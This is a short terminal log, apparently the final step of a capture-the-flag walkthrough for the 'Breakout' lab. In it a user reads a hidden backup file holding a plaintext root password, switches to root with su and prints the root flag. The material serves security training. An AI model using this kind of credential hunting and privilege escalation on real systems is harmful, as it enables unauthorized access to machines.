drwxr-xr-x 3 cyber cyber 4096 May 26 04:16 ..
-rw------- 1 cyber cyber   17 Oct 20  2021 .old_pass.bak
cyber@breakout:~/var/backups$ cat .old_pass.bak 
cat .old_pass.bak
Ts&4&YurgtRX(=~h
cyber@breakout:~/var/backups$ su  
su
Password: Ts&4&YurgtRX(=~h

root@breakout:/home/cyber/var/backups# id
id
uid=0(root) gid=0(root) groups=0(root)
root@breakout:/home/cyber/var/backups# cd ../
cd ../
root@breakout:/home/cyber/var# cd
cd
root@breakout:~# ls
ls
rOOt.txt
root@breakout:~# cat rOOt.txt
cat rOOt.txt
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}

Author: Icex64 & Empire Cybersecurity
root@breakout:~#